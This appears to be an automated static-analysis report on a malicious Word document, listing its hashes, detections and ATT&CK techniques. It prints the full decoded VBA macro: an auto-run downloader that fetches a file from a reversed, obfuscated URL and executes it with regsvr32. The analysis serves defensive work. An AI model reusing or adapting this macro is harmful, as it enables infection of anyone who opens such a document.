Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9937208619d01626…

MALICIOUS

Office (OOXML)

59.8 KB Created: 2020-04-27 09:23:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-15
MD5: eb1785e239d3867909fbfe03e56786fd SHA-1: 3a5f6547a1c2968c200210eb610d628493fd73e9 SHA-256: 9937208619d0162645a6d5a5bd61a4a8b3cc9fa5e25a38c1e379c89251828395
378 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros with an AutoOpen subroutine, indicating it is designed to execute automatically upon opening. The macros utilize URLDownloadToFile in conjunction with WScript.Shell.Exec to download and launch a second-stage payload from a remote source. This is a common technique for delivering malware.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    ' Regulatory bibliography ferry
    Call T.oP("regsvr32 " + HF)
    RW = Abs(58)
  • VBA URLDownloadToFile reversed-LOLBin launcher critical OLE_VBA_URLDOWNLOAD_REVERSED_LOLBIN
    VBA auto-exec macro downloads a payload with URLDownloadToFile and launches it through WScript.Shell.Exec using a reversed command string. This is a high-confidence downloader/launcher pattern, not an Office parser CVE.
    Matched line in script
    #If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Enum
    Sub AutoOpen()
    L = Abs(-76)
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    LA = Hex(335)
    zk = Environ(YJ)
    End Function
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/reReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4434 bytes
SHA-256: e8d7253b5568325f8d16e04a4874874dc37888bdf72d61b06bb73e8e3bd6b46b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "f5"
Function i(H)
Dim iX
iX = DateSerial(1999, 11, 7)
Dim S
S = DateSerial(2000, 5, 8)
End Function
Function r0()

' Occasionally caitiff synod plumage famous derbyshire
b9 = Hex(155)
' Religious
R = Abs(-55)
' Smock flop
iK = Fix(58)
' Amnesty vogue many
p0 = Abs(-9)
' Nine surpass
V = Fix(-35)
' However round
Dim aw
aw = DateSerial(2016, 12, 28)
' Derek trained
Yq = Fix(19)
' Wet understand spain
k = Abs(-59)
' Rely irremediable cat belarus gill
Dim E, dq
E = 4
dq = 4 / Cos(E)
' Agility elopement
yB = Abs(24)
' Her funk refresh
NS = Fix(77)
' Seventh nebula flash pall road deserve

' Canister repairs elfin offing
' Bowl communist serve houses
' Permission
N = Abs(16)
' Adaptation accruing hose inhale unalterable
B = Abs(-36)
' Dung circuits brooklyn bookseller
lZ = Fix(20)
' Suet usurper interpose laughingly troy unmerciful
Zd = Hex(84)
' Causation eighty-four reilly
J = Abs(-1)
' Disconsolate pegasus muck yearn
oJ = Hex(53)
' Rec privateer projectors
wh = Fix(-12)
' Congressional heraldic min
ZR = Abs(58)
' Docility pericles
LO = Abs(-45)
' Czechs orion mistakes repentant val
hB = Hex(216)
' Joyously erosion
Dim Jz
Jz = 4 * Atn(1)
' Ons
' Computed condensation
' Xenophon legate export mediocrity
End Function
Public Enum K6
    
Mo = 1
End Enum
Sub AutoOpen()
L = Abs(-76)
' Certainly cultural computational tangent
Dim an
an = 4 * Atn(1)
Dim vV
vV = DateSerial(2001, 9, 8)
' Principles arras

' Kathleen virile
yT = Fix(38)
qd = Abs(-59)
' Monaco egypt spotless ballet moose analyst
iW = Fix(-38)
' Decent
' Capitulation snout
' Contracts sluggard innovation inside illiteracy caribbean
Dim T As New fm

' Fealty derogatory holdings
Fr = Hex(333)
' Commander
HF = T.zk("tmp") & "\x.tmp"
Dim LJ
LJ = 4 * Atn(1)
Dim Px
Px = DateSerial(2000, 12, 20)
' March operate shops
Bf = Abs(-67)
' Forte estrangement improved
' Seas
' Wheres below bier
T.Z "bac.3opoh=l?php.p23i0oia/58ol02ew/moc.8ztd59l//:ptth", HF
BB = Abs(57)
' Wines great-grandfather socket gateway
Dim WV, OK
WV = 8
OK = 8 / Cos(WV)
Dim m
m = 4 * Atn(1)
' Beaches gut
Dim d4
d4 = 4 * Atn(1)
' Regulatory bibliography ferry
Call T.oP("regsvr32 " + HF)
RW = Abs(58)
' Galore ironic bric-a-brac spoonfuls
' H yea forty-one animals
' Sealing
' Freshman throwing array
vo = Abs(55)
' Dissertation linda
End Sub

Attribute VB_Name = "fm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
Dim Fp
Fp = DateSerial(2012, 11, 19)
' Specialized expenditures
' Deprecate employed juvenile horses
' Reserved ancestry nassau quicksand powers
' Male paul economics mauve canny
End Sub
Private Sub Class_Terminate()

' Sunset anomaly blue pick
Q = Fix(53)
' Tingle donna hosiery
' Ana corp spectacular china guatemala
End Sub
Public Function Z(y, eH)

Bs = Fix(57)
' Channels stroke wanted given scissors
je = URLDownloadToFile(0&, StrReverse(y), eH, 0&, 0&)
End Function
Public Function zk(YJ)
kU = Abs(-58)
ko = Fix(66)
' Disagreed whirr testator physicist
LA = Hex(335)
zk = Environ(YJ)
End Function
Public Sub oP(eH)

' Borough dp spice twig richardson
Dim F3, IM
F3 = 7
IM = 7 / Cos(F3)
' Homesickness ohg.
' Protective stepfather node
bc = Fix(5)
' Expired radio
Dim rg As New WshShell
rg.exec eH
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25600 bytes
SHA-256: 283039070de69a7e173c858274ac6e4f3a196ee738a9751505ef379f3b7cfab3
Detection
ClamAV: Doc.Malware.Generic-7898874-0
Obfuscation or payload: unlikely